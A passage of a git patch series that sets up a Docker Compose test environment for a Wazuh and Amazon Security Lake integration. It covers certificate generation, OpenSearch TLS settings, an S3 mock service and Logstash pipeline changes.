wazuh/indexer-security-lake-integration build: context: ../amazon-security-lake container_name: wazuh.integration.security.lake + depends_on: + - wazuh.indexer hostname: wazuh.integration.security.lake environment: LOG_LEVEL: trace @@ -72,8 +80,22 @@ services: command: tail -f /dev/null # command: /usr/share/logstash/bin/logstash -f /usr/share/logstash/pipeline/indexer-to-integrator.conf --path.settings /etc/logstash + wazuh-certs-generator: + image: wazuh-certs-generator + build: + dockerfile_inline: | + FROM ubuntu:20.04 + RUN apt-get update && apt-get install openssl curl -y + WORKDIR / + COPY wazuh-certs-generator/entrypoint.sh / + RUN chmod 700 /entrypoint.sh + ENTRYPOINT ["/entrypoint.sh"] + volumes: + - ./certs/:/certificates/ + - ./wazuh-certs-generator/certs.yml:/config/certs.yml + volumes: data: networks: - net: \ No newline at end of file + net: diff --git a/integrations/docker/wazuh-certs-generator/certs.yml b/integrations/docker/wazuh-certs-generator/certs.yml new file mode 100644 index 0000000000000..c3e017be10eea --- /dev/null +++ b/integrations/docker/wazuh-certs-generator/certs.yml @@ -0,0 +1,16 @@ +nodes: + # Wazuh indexer server nodes + indexer: + - name: wazuh.indexer + ip: wazuh.indexer + + # Wazuh server nodes + # Use node_type only with more than one Wazuh manager + server: + - name: wazuh.manager + ip: wazuh.manager + + # Wazuh dashboard node + dashboard: + - name: wazuh.dashboard + ip: wazuh.dashboard diff --git a/integrations/docker/wazuh-certs-generator/entrypoint.sh b/integrations/docker/wazuh-certs-generator/entrypoint.sh new file mode 100644 index 0000000000000..d3e0534e9be85 --- /dev/null +++ b/integrations/docker/wazuh-certs-generator/entrypoint.sh @@ -0,0 +1,61 @@ +#!/bin/bash +# Wazuh Docker Copyright (C) 2017, Wazuh Inc. (License GPLv2) + +############################################################################## +# Downloading Cert Gen Tool +############################################################################## + +## Variables +CERT_TOOL=wazuh-certs-tool.sh +PASSWORD_TOOL=wazuh-passwords-tool.sh +PACKAGES_URL=https://packages.wazuh.com/4.8/ +PACKAGES_DEV_URL=https://packages-dev.wazuh.com/4.8/ + +## Check if the cert tool exists in S3 buckets +CERT_TOOL_PACKAGES=$(curl --silent -I $PACKAGES_URL$CERT_TOOL | grep -E "^HTTP" | awk '{print $2}') +CERT_TOOL_PACKAGES_DEV=$(curl --silent -I $PACKAGES_DEV_URL$CERT_TOOL | grep -E "^HTTP" | awk '{print $2}') + +## If cert tool exists in some bucket, download it, if not exit 1 +if [ "$CERT_TOOL_PACKAGES" = "200" ]; then + curl -o $CERT_TOOL $PACKAGES_URL$CERT_TOOL -s + echo "The tool to create the certificates exists in the in Packages bucket" +elif [ "$CERT_TOOL_PACKAGES_DEV" = "200" ]; then + curl -o $CERT_TOOL $PACKAGES_DEV_URL$CERT_TOOL -s + echo "The tool to create the certificates exists in Packages-dev bucket" +else + echo "The tool to create the certificates does not exist in any bucket" + echo "ERROR: certificates were not created" + exit 1 +fi + +cp /config/certs.yml /config.yml + +chmod 700 /$CERT_TOOL + +############################################################################## +# Creating Cluster certificates +############################################################################## + +## Execute cert tool and parsin cert.yml to set UID permissions +source /$CERT_TOOL -A +nodes_server=$( cert_parseYaml /config.yml | grep nodes_server__name | sed 's/nodes_server__name=//' ) +node_names=($nodes_server) + +echo "Moving created certificates to the destination directory" +cp /wazuh-certificates/* /certificates/ +echo "Changing certificate permissions" +chmod -R 500 /certificates +chmod -R 400 /certificates/* +echo "Setting UID indexer and dashboard" +chown 1000:1000 /certificates/* +echo "Setting UID for wazuh manager and worker" +cp /certificates/root-ca.pem /certificates/root-ca-manager.pem +cp /certificates/root-ca.key /certificates/root-ca-manager.key +chown 101:101 /certificates/root-ca-manager.pem +chown 101:101 /certificates/root-ca-manager.key + +for i in ${node_names[@]}; +do + chown 101:101 "/certificates/${i}.pem" + chown 101:101 "/certificates/${i}-key.pem" +done From 4279b6e03da530cb95b52a9a96aaf45feaebe98b Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Thu, 22 Feb 2024 17:33:46 -0300 Subject: [PATCH 54/77] Add certificate config to docker compose file --- integrations/docker/amazon-security-lake.yml | 12 ++++++++++-- 1 file changed, 10 insertions(+), 2 deletions(-) diff --git a/integrations/docker/amazon-security-lake.yml b/integrations/docker/amazon-security-lake.yml index 2ae38b84a4baf..9a0eedae1cb94 100644 --- a/integrations/docker/amazon-security-lake.yml +++ b/integrations/docker/amazon-security-lake.yml @@ -26,6 +26,15 @@ services: - discovery.type=single-node # - cluster.initial_cluster_manager_nodes=opensearch-node - bootstrap.memory_lock=true + - "DISABLE_INSTALL_DEMO_CONFIG=true" + - plugins.security.ssl.http.pemcert_filepath="certs/wazuh.indexer.pem" + - plugins.security.ssl.transport.pemcert_filepath="certs/wazuh.indexer.pem" + - plugins.security.ssl.http.pemkey_filepath="certs/wazuh.indexer-key.pem" + - plugins.security.ssl.transport.pemkey_filepath="certs/wazuh.indexer-key.pem" + - plugins.security.ssl.http.pemtrustedcas_filepath="certs/root-ca.pem" + - plugins.security.ssl.transport.pemtrustedcas_filepath="certs/root-ca.pem" + - plugins.security.authcz.admin_dn="CN=wazuh.indexer,OU=Wazuh,O=Wazuh,L=California, C=US" + - "OPENSEARCH_JAVA_OPTS=-Xms512m -Xmx512m" ulimits: memlock: @@ -36,6 +45,7 @@ services: hard: 65536 volumes: - data:/usr/share/opensearch/data + - ./certs/:/usr/share/opensearch/config/certs/ networks: - net @@ -73,8 +83,6 @@ services: - "9600:9600" volumes: - ../amazon-security-lake/logstash/pipeline:/usr/share/logstash/pipeline - depends_on: - - wazuh.indexer networks: - net command: tail -f /dev/null From 65b3b10e2dddc1d57bc11366de0e9cf679666866 Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Thu, 22 Feb 2024 18:06:49 -0300 Subject: [PATCH 55/77] Use secrets for certificates --- integrations/docker/amazon-security-lake.yml | 37 +++++++++++++++----- 1 file changed, 29 insertions(+), 8 deletions(-) diff --git a/integrations/docker/amazon-security-lake.yml b/integrations/docker/amazon-security-lake.yml index 9a0eedae1cb94..1577df6b75187 100644 --- a/integrations/docker/amazon-security-lake.yml +++ b/integrations/docker/amazon-security-lake.yml @@ -27,14 +27,13 @@ services: # - cluster.initial_cluster_manager_nodes=opensearch-node - bootstrap.memory_lock=true - "DISABLE_INSTALL_DEMO_CONFIG=true" - - plugins.security.ssl.http.pemcert_filepath="certs/wazuh.indexer.pem" - - plugins.security.ssl.transport.pemcert_filepath="certs/wazuh.indexer.pem" - - plugins.security.ssl.http.pemkey_filepath="certs/wazuh.indexer-key.pem" - - plugins.security.ssl.transport.pemkey_filepath="certs/wazuh.indexer-key.pem" - - plugins.security.ssl.http.pemtrustedcas_filepath="certs/root-ca.pem" - - plugins.security.ssl.transport.pemtrustedcas_filepath="certs/root-ca.pem" + - plugins.security.ssl.http.pemcert_filepath=/run/secrets/wazuh.indexer_http.pemcert + - plugins.security.ssl.transport.pemcert_filepath=/run/secrets/wazuh.indexer_transport.pemcert + - plugins.security.ssl.http.pemkey_filepath=/run/secrets/wazuh.indexer_http.pemkey + - plugins.security.ssl.transport.pemkey_filepath=/run/secrets/wazuh.indexer_transport.pemkey + - plugins.security.ssl.http.pemtrustedcas_filepath=/run/secrets/wazuh.indexer_http.pemtrustedcas + - plugins.security.ssl.transport.pemtrustedcas_filepath=/run/secrets/wazuh.indexer_transport.pemtrustedcas - plugins.security.authcz.admin_dn="CN=wazuh.indexer,OU=Wazuh,O=Wazuh,L=California, C=US" - - "OPENSEARCH_JAVA_OPTS=-Xms512m -Xmx512m" ulimits: memlock: @@ -45,9 +44,15 @@ services: hard: 65536 volumes: - data:/usr/share/opensearch/data - - ./certs/:/usr/share/opensearch/config/certs/ networks: - net + secrets: + - wazuh.indexer_http.pemcert + - wazuh.indexer_transport.pemcert + - wazuh.indexer_http.pemkey + - wazuh.indexer_transport.pemkey + - wazuh.indexer_http.pemtrustedcas + - wazuh.indexer_transport.pemtrustedcas wazuh.dashboard: image: opensearchproject/opensearch-dashboards:2.11.1 @@ -64,6 +69,7 @@ services: networks: - net + wazuh.integration.security.lake: image: wazuh/indexer-security-lake-integration build: @@ -104,6 +110,21 @@ services: volumes: data: + certs: networks: net: + +secrets: + wazuh.indexer_http.pemcert: + file: ./certs/wazuh.indexer.pem + wazuh.indexer_transport.pemcert: + file: ./certs/wazuh.indexer.pem + wazuh.indexer_http.pemkey: + file: ./certs/wazuh.indexer-key.pem + wazuh.indexer_transport.pemkey: + file: ./certs/wazuh.indexer-key.pem + wazuh.indexer_http.pemtrustedcas: + file: ./certs/root-ca.pem + wazuh.indexer_transport.pemtrustedcas: + file: ./certs/root-ca.pem From c0d6d2c8605470031822cd76d01a79b5e02499a1 Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Thu, 22 Feb 2024 18:11:27 -0300 Subject: [PATCH 56/77] Disable permission handling inside cert's generator entrypoint.sh --- integrations/docker/wazuh-certs-generator/entrypoint.sh | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/integrations/docker/wazuh-certs-generator/entrypoint.sh b/integrations/docker/wazuh-certs-generator/entrypoint.sh index d3e0534e9be85..4e0a2d99a4197 100644 --- a/integrations/docker/wazuh-certs-generator/entrypoint.sh +++ b/integrations/docker/wazuh-certs-generator/entrypoint.sh @@ -44,14 +44,14 @@ node_names=($nodes_server) echo "Moving created certificates to the destination directory" cp /wazuh-certificates/* /certificates/ echo "Changing certificate permissions" -chmod -R 500 /certificates -chmod -R 400 /certificates/* +#chmod -R 500 /certificates +#chmod -R 400 /certificates/* echo "Setting UID indexer and dashboard" -chown 1000:1000 /certificates/* +#chown 1000:1000 /certificates/* echo "Setting UID for wazuh manager and worker" cp /certificates/root-ca.pem /certificates/root-ca-manager.pem cp /certificates/root-ca.key /certificates/root-ca-manager.key -chown 101:101 /certificates/root-ca-manager.pem +#chown 101:101 /certificates/root-ca-manager.pem chown 101:101 /certificates/root-ca-manager.key for i in ${node_names[@]}; From 017a9083fe07ea2e8356c91f4cf4a20c688f864a Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Thu, 22 Feb 2024 18:12:34 -0300 Subject: [PATCH 57/77] Back to using a bind mount for certs --- integrations/docker/amazon-security-lake.yml | 1 - 1 file changed, 1 deletion(-) diff --git a/integrations/docker/amazon-security-lake.yml b/integrations/docker/amazon-security-lake.yml index 1577df6b75187..b8f1bc6eb0391 100644 --- a/integrations/docker/amazon-security-lake.yml +++ b/integrations/docker/amazon-security-lake.yml @@ -110,7 +110,6 @@ services: volumes: data: - certs: networks: net: From 2a60c41c18bd80cd3bc03032f1d5a0c8a204c7ff Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Thu, 22 Feb 2024 18:46:44 -0300 Subject: [PATCH 58/77] Have entrypoint.sh generate certs with 1000:1000 ownership --- integrations/docker/amazon-security-lake.yml | 3 ++- integrations/docker/wazuh-certs-generator/entrypoint.sh | 4 ++-- 2 files changed, 4 insertions(+), 3 deletions(-) diff --git a/integrations/docker/amazon-security-lake.yml b/integrations/docker/amazon-security-lake.yml index b8f1bc6eb0391..6bf780d6eea90 100644 --- a/integrations/docker/amazon-security-lake.yml +++ b/integrations/docker/amazon-security-lake.yml @@ -1,4 +1,4 @@ -version: '3' +version: '3.8' name: "amazon-security-lake" services: @@ -53,6 +53,7 @@ services: - wazuh.indexer_transport.pemkey - wazuh.indexer_http.pemtrustedcas - wazuh.indexer_transport.pemtrustedcas + #command: tail -f /dev/null wazuh.dashboard: image: opensearchproject/opensearch-dashboards:2.11.1 diff --git a/integrations/docker/wazuh-certs-generator/entrypoint.sh b/integrations/docker/wazuh-certs-generator/entrypoint.sh index 4e0a2d99a4197..15804af0803c3 100644 --- a/integrations/docker/wazuh-certs-generator/entrypoint.sh +++ b/integrations/docker/wazuh-certs-generator/entrypoint.sh @@ -44,10 +44,10 @@ node_names=($nodes_server) echo "Moving created certificates to the destination directory" cp /wazuh-certificates/* /certificates/ echo "Changing certificate permissions" -#chmod -R 500 /certificates +chmod -R 400 /certificates #chmod -R 400 /certificates/* echo "Setting UID indexer and dashboard" -#chown 1000:1000 /certificates/* +chown -R 1000:1000 /certificates echo "Setting UID for wazuh manager and worker" cp /certificates/root-ca.pem /certificates/root-ca-manager.pem cp /certificates/root-ca.key /certificates/root-ca-manager.key From 91da2c2bc59ce166a62e4f2168a5696b42136824 Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Fri, 23 Feb 2024 11:32:14 -0300 Subject: [PATCH 59/77] Correct certificate permissions and bind mounting --- integrations/docker/amazon-security-lake.yml | 40 ++++++------------- .../wazuh-certs-generator/entrypoint.sh | 22 +++++----- 2 files changed, 24 insertions(+), 38 deletions(-) diff --git a/integrations/docker/amazon-security-lake.yml b/integrations/docker/amazon-security-lake.yml index 6bf780d6eea90..3eeba35206169 100644 --- a/integrations/docker/amazon-security-lake.yml +++ b/integrations/docker/amazon-security-lake.yml @@ -20,6 +20,8 @@ services: depends_on: - wazuh-certs-generator hostname: wazuh.indexer + ports: + - 9200:9200 environment: # - cluster.name=opensearch-cluster - node.name=wazuh.indexer @@ -27,12 +29,14 @@ services: # - cluster.initial_cluster_manager_nodes=opensearch-node - bootstrap.memory_lock=true - "DISABLE_INSTALL_DEMO_CONFIG=true" - - plugins.security.ssl.http.pemcert_filepath=/run/secrets/wazuh.indexer_http.pemcert - - plugins.security.ssl.transport.pemcert_filepath=/run/secrets/wazuh.indexer_transport.pemcert - - plugins.security.ssl.http.pemkey_filepath=/run/secrets/wazuh.indexer_http.pemkey - - plugins.security.ssl.transport.pemkey_filepath=/run/secrets/wazuh.indexer_transport.pemkey - - plugins.security.ssl.http.pemtrustedcas_filepath=/run/secrets/wazuh.indexer_http.pemtrustedcas - - plugins.security.ssl.transport.pemtrustedcas_filepath=/run/secrets/wazuh.indexer_transport.pemtrustedcas + - plugins.security.ssl.http.enabled=true + #- plugins.security.allow_default_init_securityindex=true + - plugins.security.ssl.http.pemcert_filepath=/usr/share/opensearch/config/wazuh.indexer.pem + - plugins.security.ssl.transport.pemcert_filepath=/usr/share/opensearch/config/wazuh.indexer.pem + - plugins.security.ssl.http.pemkey_filepath=/usr/share/opensearch/config/wazuh.indexer-key.pem + - plugins.security.ssl.transport.pemkey_filepath=/usr/share/opensearch/config/wazuh.indexer-key.pem + - plugins.security.ssl.http.pemtrustedcas_filepath=/usr/share/opensearch/config/root-ca.pem + - plugins.security.ssl.transport.pemtrustedcas_filepath=/usr/share/opensearch/config/root-ca.pem - plugins.security.authcz.admin_dn="CN=wazuh.indexer,OU=Wazuh,O=Wazuh,L=California, C=US" - "OPENSEARCH_JAVA_OPTS=-Xms512m -Xmx512m" ulimits: @@ -44,15 +48,11 @@ services: hard: 65536 volumes: - data:/usr/share/opensearch/data + - ./certs/wazuh.indexer.pem:/usr/share/opensearch/config/wazuh.indexer.pem + - ./certs/wazuh.indexer-key.pem:/usr/share/opensearch/config/wazuh.indexer-key.pem + - ./certs/root-ca.pem:/usr/share/opensearch/config/root-ca.pem networks: - net - secrets: - - wazuh.indexer_http.pemcert - - wazuh.indexer_transport.pemcert - - wazuh.indexer_http.pemkey - - wazuh.indexer_transport.pemkey - - wazuh.indexer_http.pemtrustedcas - - wazuh.indexer_transport.pemtrustedcas #command: tail -f /dev/null wazuh.dashboard: @@ -114,17 +114,3 @@ volumes: networks: net: - -secrets: - wazuh.indexer_http.pemcert: - file: ./certs/wazuh.indexer.pem - wazuh.indexer_transport.pemcert: - file: ./certs/wazuh.indexer.pem - wazuh.indexer_http.pemkey: - file: ./certs/wazuh.indexer-key.pem - wazuh.indexer_transport.pemkey: - file: ./certs/wazuh.indexer-key.pem - wazuh.indexer_http.pemtrustedcas: - file: ./certs/root-ca.pem - wazuh.indexer_transport.pemtrustedcas: - file: ./certs/root-ca.pem diff --git a/integrations/docker/wazuh-certs-generator/entrypoint.sh b/integrations/docker/wazuh-certs-generator/entrypoint.sh index 15804af0803c3..6e51d6e4cb423 100644 --- a/integrations/docker/wazuh-certs-generator/entrypoint.sh +++ b/integrations/docker/wazuh-certs-generator/entrypoint.sh @@ -44,18 +44,18 @@ node_names=($nodes_server) echo "Moving created certificates to the destination directory" cp /wazuh-certificates/* /certificates/ echo "Changing certificate permissions" -chmod -R 400 /certificates -#chmod -R 400 /certificates/* +chmod 700 /certificates +chmod 400 /certificates/* echo "Setting UID indexer and dashboard" chown -R 1000:1000 /certificates -echo "Setting UID for wazuh manager and worker" -cp /certificates/root-ca.pem /certificates/root-ca-manager.pem -cp /certificates/root-ca.key /certificates/root-ca-manager.key +#echo "Setting UID for wazuh manager and worker" +#cp /certificates/root-ca.pem /certificates/root-ca-manager.pem +#cp /certificates/root-ca.key /certificates/root-ca-manager.key #chown 101:101 /certificates/root-ca-manager.pem -chown 101:101 /certificates/root-ca-manager.key +#chown 101:101 /certificates/root-ca-manager.key -for i in ${node_names[@]}; -do - chown 101:101 "/certificates/${i}.pem" - chown 101:101 "/certificates/${i}-key.pem" -done +#for i in ${node_names[@]}; +#do +# chown 101:101 "/certificates/${i}.pem" +# chown 101:101 "/certificates/${i}-key.pem" +#done From 55f07264dd116379b9214cde88cc4f205f9764c0 Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Fri, 23 Feb 2024 11:52:25 -0300 Subject: [PATCH 60/77] Add security initialization variable to compose file --- integrations/docker/amazon-security-lake.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/integrations/docker/amazon-security-lake.yml b/integrations/docker/amazon-security-lake.yml index 3eeba35206169..91fc8fcff887a 100644 --- a/integrations/docker/amazon-security-lake.yml +++ b/integrations/docker/amazon-security-lake.yml @@ -30,7 +30,7 @@ services: - bootstrap.memory_lock=true - "DISABLE_INSTALL_DEMO_CONFIG=true" - plugins.security.ssl.http.enabled=true - #- plugins.security.allow_default_init_securityindex=true + - plugins.security.allow_default_init_securityindex=true - plugins.security.ssl.http.pemcert_filepath=/usr/share/opensearch/config/wazuh.indexer.pem - plugins.security.ssl.transport.pemcert_filepath=/usr/share/opensearch/config/wazuh.indexer.pem - plugins.security.ssl.http.pemkey_filepath=/usr/share/opensearch/config/wazuh.indexer-key.pem From 454d6fdb918f3337f58b7240b94a1aa4a67326b0 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=C3=81lex=20Ruiz?= Date: Fri, 23 Feb 2024 18:11:11 +0100 Subject: [PATCH 61/77] Add S3 Ninja (Mock) --- integrations/docker/amazon-security-lake.yml | 15 +++++++++++++++ 1 file changed, 15 insertions(+) diff --git a/integrations/docker/amazon-security-lake.yml b/integrations/docker/amazon-security-lake.yml index 5c2b09d133089..d44598029eb0f 100644 --- a/integrations/docker/amazon-security-lake.yml +++ b/integrations/docker/amazon-security-lake.yml @@ -48,6 +48,7 @@ services: OPENSEARCH_HOSTS: '["https://wazuh.indexer:9200"]' # Define the OpenSearch nodes that OpenSearch Dashboards will query networks: - net + wazuh.integration.security.lake: image: wazuh/indexer-security-lake-integration build: @@ -58,6 +59,8 @@ services: LOG_LEVEL: trace LOGSTASH_KEYSTORE_PASS: "SecretPassword" MONITORING_ENABLED: false + AWS_KEY: "AKIAIOSFODNN7EXAMPLE" + AWS_SECRET: "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY" ports: - "5000:5000/tcp" - "5000:5000/udp" @@ -72,8 +75,20 @@ services: command: tail -f /dev/null # command: /usr/share/logstash/bin/logstash -f /usr/share/logstash/pipeline/indexer-to-integrator.conf --path.settings /etc/logstash + s3.ninja: + image: scireum/s3-ninja:latest + container_name: s3.ninja + hostname: s3.ninja + ports: + - "9444:9000" + volumes: + - s3-data:/home/sirius/data + networks: + - net + volumes: data: + s3-data: networks: net: \ No newline at end of file From a9f95723a9d439ba289a4ee63b44f8dc99ab58dd Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Fri, 23 Feb 2024 15:53:03 -0300 Subject: [PATCH 62/77] Fix permissions on certs generator entrypoint --- .../pipeline/indexer-to-integrator.conf | 21 +++++---- integrations/docker/amazon-security-lake.yml | 47 +++++++------------ .../wazuh-certs-generator/entrypoint.sh | 8 +++- 3 files changed, 38 insertions(+), 38 deletions(-) diff --git a/integrations/amazon-security-lake/logstash/pipeline/indexer-to-integrator.conf b/integrations/amazon-security-lake/logstash/pipeline/indexer-to-integrator.conf index 0cc7a7d089ec3..7784619a799ea 100644 --- a/integrations/amazon-security-lake/logstash/pipeline/indexer-to-integrator.conf +++ b/integrations/amazon-security-lake/logstash/pipeline/indexer-to-integrator.conf @@ -3,7 +3,8 @@ input { hosts => ["opensearch-node:9200"] user => "${INDEXER_USERNAME}" password => "${INDEXER_PASSWORD}" - ssl => false + ssl => true + ca_file => "/usr/share/logstash/root-ca.pem" index => "wazuh-alerts-4.x-*" query => '{ "query": { @@ -21,14 +22,18 @@ input { output { - stdout { codec => rubydebug } - - pipe + stdout { - id => "securityLake" - message_format => "%{_source}" - ttl => "10" - command => "/usr/bin/env python3 /usr/local/bin/stdin_to_securitylake.py -d" + id => "standardOutputPipeline" + codec => rubydebug } + #pipe + #{ + # id => "securityLake" + # message_format => "%{_source}" + # ttl => "10" + # command => "/usr/bin/env python3 /usr/local/bin/stdin_to_securitylake.py -d" + #} + } diff --git a/integrations/docker/amazon-security-lake.yml b/integrations/docker/amazon-security-lake.yml index 91fc8fcff887a..a8735de543b4d 100644 --- a/integrations/docker/amazon-security-lake.yml +++ b/integrations/docker/amazon-security-lake.yml @@ -8,17 +8,16 @@ services: context: ../tools/events-generator container_name: events-generator depends_on: - - wazuh.indexer - networks: - - net - # TODO add healthcheck to indexer's service to avoid sending requests before API is ready. - command: bash -c "sleep 10 && echo 'Ey, wake up!' && python run.py -a wazuh.indexer" + wazuh.indexer: + condition: service_healthy + command: bash -c "python run.py -a wazuh.indexer" wazuh.indexer: image: opensearchproject/opensearch:2.11.1 container_name: wazuh.indexer depends_on: - - wazuh-certs-generator + wazuh-certs-generator: + condition: service_completed_successfully hostname: wazuh.indexer ports: - 9200:9200 @@ -46,13 +45,15 @@ services: nofile: soft: 65536 hard: 65536 + healthcheck: + test: curl -sku admin:admin https://localhost:9200/_cat/health | grep -q docker-cluster + start_period: 10s + start_interval: 3s volumes: - data:/usr/share/opensearch/data - ./certs/wazuh.indexer.pem:/usr/share/opensearch/config/wazuh.indexer.pem - ./certs/wazuh.indexer-key.pem:/usr/share/opensearch/config/wazuh.indexer-key.pem - ./certs/root-ca.pem:/usr/share/opensearch/config/root-ca.pem - networks: - - net #command: tail -f /dev/null wazuh.dashboard: @@ -67,9 +68,6 @@ services: - "5601" # Expose port 5601 for web access to OpenSearch Dashboards environment: OPENSEARCH_HOSTS: '["https://wazuh.indexer:9200"]' # Define the OpenSearch nodes that OpenSearch Dashboards will query - networks: - - net - wazuh.integration.security.lake: image: wazuh/indexer-security-lake-integration @@ -90,27 +88,18 @@ services: - "9600:9600" volumes: - ../amazon-security-lake/logstash/pipeline:/usr/share/logstash/pipeline - networks: - - net - command: tail -f /dev/null - # command: /usr/share/logstash/bin/logstash -f /usr/share/logstash/pipeline/indexer-to-integrator.conf --path.settings /etc/logstash + - ./certs/root-ca.pem:/usr/share/logstash/root-ca.pem + #command: tail -f /dev/null + command: /usr/share/logstash/bin/logstash -f /usr/share/logstash/pipeline/indexer-to-integrator.conf --path.settings /etc/logstash --config.reload.automatic wazuh-certs-generator: - image: wazuh-certs-generator - build: - dockerfile_inline: | - FROM ubuntu:20.04 - RUN apt-get update && apt-get install openssl curl -y - WORKDIR / - COPY wazuh-certs-generator/entrypoint.sh / - RUN chmod 700 /entrypoint.sh - ENTRYPOINT ["/entrypoint.sh"] + image: wazuh/wazuh-certs-generator:0.0.1 + hostname: wazuh-certs-generator + container_name: wazuh-certs-generator + entrypoint: sh -c "/entrypoint.sh; chown -R 1000:999 /certificates; chmod 740 /certificates; chmod 440 /certificates/*" volumes: - ./certs/:/certificates/ - - ./wazuh-certs-generator/certs.yml:/config/certs.yml - + - ./config/certs.yml:/config/certs.yml + volumes: data: - -networks: - net: diff --git a/integrations/docker/wazuh-certs-generator/entrypoint.sh b/integrations/docker/wazuh-certs-generator/entrypoint.sh index 6e51d6e4cb423..2d173c2943692 100644 --- a/integrations/docker/wazuh-certs-generator/entrypoint.sh +++ b/integrations/docker/wazuh-certs-generator/entrypoint.sh @@ -45,7 +45,7 @@ echo "Moving created certificates to the destination directory" cp /wazuh-certificates/* /certificates/ echo "Changing certificate permissions" chmod 700 /certificates -chmod 400 /certificates/* +chmod 440 /certificates/* echo "Setting UID indexer and dashboard" chown -R 1000:1000 /certificates #echo "Setting UID for wazuh manager and worker" @@ -59,3 +59,9 @@ chown -R 1000:1000 /certificates # chown 101:101 "/certificates/${i}.pem" # chown 101:101 "/certificates/${i}-key.pem" #done + +for i in /certificates/*key* +do + chmod 400 $i +done + From c854dc509cb852d39ceee41f310b897866c6c76f Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Fri, 23 Feb 2024 15:55:00 -0300 Subject: [PATCH 63/77] Add cert generator config file --- integrations/docker/config/certs.yml | 16 ++++++++++++++++ 1 file changed, 16 insertions(+) create mode 100644 integrations/docker/config/certs.yml diff --git a/integrations/docker/config/certs.yml b/integrations/docker/config/certs.yml new file mode 100644 index 0000000000000..c3e017be10eea --- /dev/null +++ b/integrations/docker/config/certs.yml @@ -0,0 +1,16 @@ +nodes: + # Wazuh indexer server nodes + indexer: + - name: wazuh.indexer + ip: wazuh.indexer + + # Wazuh server nodes + # Use node_type only with more than one Wazuh manager + server: + - name: wazuh.manager + ip: wazuh.manager + + # Wazuh dashboard node + dashboard: + - name: wazuh.dashboard + ip: wazuh.dashboard From 422cf1c77c8a8109764b1c7b4bc7793bf2b02fff Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Fri, 23 Feb 2024 15:56:18 -0300 Subject: [PATCH 64/77] Remove old cert generator dir --- .../docker/wazuh-certs-generator/certs.yml | 16 ----- .../wazuh-certs-generator/entrypoint.sh | 67 ------------------- 2 files changed, 83 deletions(-) delete mode 100644 integrations/docker/wazuh-certs-generator/certs.yml delete mode 100644 integrations/docker/wazuh-certs-generator/entrypoint.sh diff --git a/integrations/docker/wazuh-certs-generator/certs.yml b/integrations/docker/wazuh-certs-generator/certs.yml deleted file mode 100644 index c3e017be10eea..0000000000000 --- a/integrations/docker/wazuh-certs-generator/certs.yml +++ /dev/null @@ -1,16 +0,0 @@ -nodes: - # Wazuh indexer server nodes - indexer: - - name: wazuh.indexer - ip: wazuh.indexer - - # Wazuh server nodes - # Use node_type only with more than one Wazuh manager - server: - - name: wazuh.manager - ip: wazuh.manager - - # Wazuh dashboard node - dashboard: - - name: wazuh.dashboard - ip: wazuh.dashboard diff --git a/integrations/docker/wazuh-certs-generator/entrypoint.sh b/integrations/docker/wazuh-certs-generator/entrypoint.sh deleted file mode 100644 index 2d173c2943692..0000000000000 --- a/integrations/docker/wazuh-certs-generator/entrypoint.sh +++ /dev/null @@ -1,67 +0,0 @@ -#!/bin/bash -# Wazuh Docker Copyright (C) 2017, Wazuh Inc. (License GPLv2) - -############################################################################## -# Downloading Cert Gen Tool -############################################################################## - -## Variables -CERT_TOOL=wazuh-certs-tool.sh -PASSWORD_TOOL=wazuh-passwords-tool.sh -PACKAGES_URL=https://packages.wazuh.com/4.8/ -PACKAGES_DEV_URL=https://packages-dev.wazuh.com/4.8/ - -## Check if the cert tool exists in S3 buckets -CERT_TOOL_PACKAGES=$(curl --silent -I $PACKAGES_URL$CERT_TOOL | grep -E "^HTTP" | awk '{print $2}') -CERT_TOOL_PACKAGES_DEV=$(curl --silent -I $PACKAGES_DEV_URL$CERT_TOOL | grep -E "^HTTP" | awk '{print $2}') - -## If cert tool exists in some bucket, download it, if not exit 1 -if [ "$CERT_TOOL_PACKAGES" = "200" ]; then - curl -o $CERT_TOOL $PACKAGES_URL$CERT_TOOL -s - echo "The tool to create the certificates exists in the in Packages bucket" -elif [ "$CERT_TOOL_PACKAGES_DEV" = "200" ]; then - curl -o $CERT_TOOL $PACKAGES_DEV_URL$CERT_TOOL -s - echo "The tool to create the certificates exists in Packages-dev bucket" -else - echo "The tool to create the certificates does not exist in any bucket" - echo "ERROR: certificates were not created" - exit 1 -fi - -cp /config/certs.yml /config.yml - -chmod 700 /$CERT_TOOL - -############################################################################## -# Creating Cluster certificates -############################################################################## - -## Execute cert tool and parsin cert.yml to set UID permissions -source /$CERT_TOOL -A -nodes_server=$( cert_parseYaml /config.yml | grep nodes_server__name | sed 's/nodes_server__name=//' ) -node_names=($nodes_server) - -echo "Moving created certificates to the destination directory" -cp /wazuh-certificates/* /certificates/ -echo "Changing certificate permissions" -chmod 700 /certificates -chmod 440 /certificates/* -echo "Setting UID indexer and dashboard" -chown -R 1000:1000 /certificates -#echo "Setting UID for wazuh manager and worker" -#cp /certificates/root-ca.pem /certificates/root-ca-manager.pem -#cp /certificates/root-ca.key /certificates/root-ca-manager.key -#chown 101:101 /certificates/root-ca-manager.pem -#chown 101:101 /certificates/root-ca-manager.key - -#for i in ${node_names[@]}; -#do -# chown 101:101 "/certificates/${i}.pem" -# chown 101:101 "/certificates/${i}-key.pem" -#done - -for i in /certificates/*key* -do - chmod 400 $i -done - From 21f89f887f8846b59fd86823581658868855d3e0 Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Fri, 23 Feb 2024 16:17:59 -0300 Subject: [PATCH 65/77] Set indexer hostname right in pipeline file --- .../logstash/pipeline/indexer-to-integrator.conf | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/integrations/amazon-security-lake/logstash/pipeline/indexer-to-integrator.conf b/integrations/amazon-security-lake/logstash/pipeline/indexer-to-integrator.conf index 7784619a799ea..e567587aebc69 100644 --- 